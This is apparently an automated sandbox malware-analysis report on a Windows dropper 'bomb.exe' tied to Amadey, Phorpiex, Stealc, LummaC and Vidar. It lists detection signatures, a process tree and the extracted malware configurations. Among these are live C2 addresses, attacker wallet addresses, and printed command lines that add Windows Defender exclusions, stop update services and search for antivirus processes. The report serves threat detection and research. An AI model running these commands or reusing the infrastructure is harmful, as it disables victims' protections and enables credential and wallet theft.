Edit tour

Windows Analysis Report
bomb.exe

Overview

General Information

Sample name:	bomb.exe
Analysis ID:	1526331
MD5:	55dba6e7aa4e8cc73415f4e3f9f6bdae
SHA1:	87c9f29d58f57a5e025061d389be2655ee879d5d
SHA256:	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
Tags:	exePatchworkuser-JAMESWT_MHT
Infos:

Detection

Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Sigma detected: Stop multiple services

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected Phorpiex

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to check if Internet connection is working

Contains functionality to detect sleep reduction / modifications

Contains functionality to inject code into remote processes

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found strings related to Crypto-Mining

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

bomb.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\bomb.exe" MD5: 55DBA6E7AA4E8CC73415F4E3F9F6BDAE)

conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

http185.215.113.66pei.exe.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\http185.215.113.66pei.exe.exe" MD5: 8D8E6C7952A9DC7C0C73911C4DBC5518)

323057790.exe (PID: 7664 cmdline: C:\Users\user\AppData\Local\Temp\323057790.exe MD5: 930C41BC0C20865AF61A95BCF0C3B289)

sysvplervcs.exe (PID: 7872 cmdline: C:\Users\user\sysvplervcs.exe MD5: 930C41BC0C20865AF61A95BCF0C3B289)

cmd.exe (PID: 8088 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8164 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 8104 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2196 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 4076 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 2720 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 2056 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 2844 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

http185.215.113.66newtpp.exe.exe (PID: 5660 cmdline: "C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe" MD5: 930C41BC0C20865AF61A95BCF0C3B289)

sysvplervcs.exe (PID: 7288 cmdline: C:\Windows\sysvplervcs.exe MD5: 930C41BC0C20865AF61A95BCF0C3B289)

httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe" MD5: 207386C6A291C524E69D51A356F8352C)

MSBuild.exe (PID: 6988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 7188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 280 MD5: C31336C1EFC2CCB44B4326EA793040F2)

http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe (PID: 1612 cmdline: "C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe" MD5: FCFFB8B429A1BD3DEB45AA076909C6B8)

RegSvcs.exe (PID: 7172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

http77.105.161.194file1.exe.exe (PID: 2720 cmdline: "C:\Users\user\Desktop\http77.105.161.194file1.exe.exe" MD5: 774C8215DA3CB73644D36CA3F60E676B)

cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7760 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7884 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7896 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7972 cmdline: cmd /c md 400445 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7988 cmdline: findstr /V "navyfurthermoreacceptableinvestigator" Profession MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8004 cmdline: cmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Batch.pif (PID: 8020 cmdline: Batch.pif O MD5: 18CE19B57F43CE0A5AF149C96AECC685)

choice.exe (PID: 8040 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe" MD5: 588DA7A05FE6D237B82EA541C0E9D1CB)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe" MD5: 2F208B17F8BDA673F6B4F0DACF43D1BF)

httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe" MD5: 0BD8936501F04777F9C8684B417B6399)

httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe" MD5: EFD6377CF1F3E1EFD885DB9343A9A686)

httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe (PID: 1144 cmdline: "C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe" MD5: 07FC5B4F3A432B09B0D51F8B00EF05F3)

svchost.exe (PID: 2472 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1308 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

sysvplervcs.exe (PID: 6656 cmdline: "C:\Windows\sysvplervcs.exe" MD5: 930C41BC0C20865AF61A95BCF0C3B289)

sysvplervcs.exe (PID: 7308 cmdline: "C:\Users\user\sysvplervcs.exe" MD5: 930C41BC0C20865AF61A95BCF0C3B289)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Phorpiex	Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.	No Attribution	https://bin.re/blog/phorpiex/ https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html https://research.checkpoint.com/2019/phorpiex-breakdown/ https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/	https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://45.152.113.10/92335b4816f77e90.php", "Botnet": "cry"}

Threatname: LummaC

{"C2 url": ["traineiwnqo.shop", "evoliutwoqm.shop", "awwardwiqi.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "condedqpwqm.shop"], "Build id": "E6UHNR--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b99f23e6ab2693b305f8810abd671d18"}

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Threatname: Amadey

{"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
\Device\ConDrv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\323057790.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Windows\sysvplervcs.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\sysvplervcs.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	INDICATOR_EXE_Packed_DotNetReactor	Detects executables packed with unregistered version of .NET Reactor	ditekSHen	0x4ea4e:$s2: is protected by an unregistered version of .NET Reactor!" );</script>
C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000017.00000002.1958409377.0000000000410000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000011.00000002.1910895960.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000030.00000000.2071621421.0000000000410000.00000002.00000001.01000000.00000016.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000004.00000000.1851991589.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
0000001A.00000002.4201400872.0000000000410000.00000002.00000001.01000000.00000016.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000017.00000003.1947158859.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000031.00000002.3020983924.0000000003160000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000029.00000000.1978134558.0000000000410000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000006.00000002.4297613922.0000000003749000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000032.00000002.2952010686.000000C000648000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000013.00000002.1890590465.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000031.00000002.3020983924.0000000003250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000028.00000002.4200675181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000000.1882503312.0000000000410000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000031.00000002.3020983924.00000000032F0000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000017.00000000.1919322254.0000000000410000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000029.00000002.2003396502.0000000000410000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
0000001A.00000000.1947093681.0000000000410000.00000002.00000001.01000000.00000016.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000030.00000002.2096751492.0000000000410000.00000002.00000001.01000000.00000016.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp	HiddenCobra_BANKSHOT_Gen	Detects Hidden Cobra BANKSHOT trojan	Florian Roth	0x5deaf:$x5: vchost.exe 0x5eeaf:$x5: vchost.exe
0000000F.00000002.1908225903.0000000000410000.00000002.00000001.01000000.00000011.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000004.00000002.1911911144.000000000067E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000032.00000002.3173981696.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000032.00000000.2113906593.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: bomb.exe PID: 6936	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: bomb.exe PID: 6936	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: bomb.exe PID: 6936	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: bomb.exe PID: 6936	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: http185.215.113.66newtpp.exe.exe PID: 5660	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 6916	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6916	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 6916	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: sysvplervcs.exe PID: 7288	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe PID: 7308	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7440	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 323057790.exe PID: 7664	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysvplervcs.exe PID: 7872	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysvplervcs.exe PID: 6656	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.0.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
23.2.323057790.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
41.2.sysvplervcs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
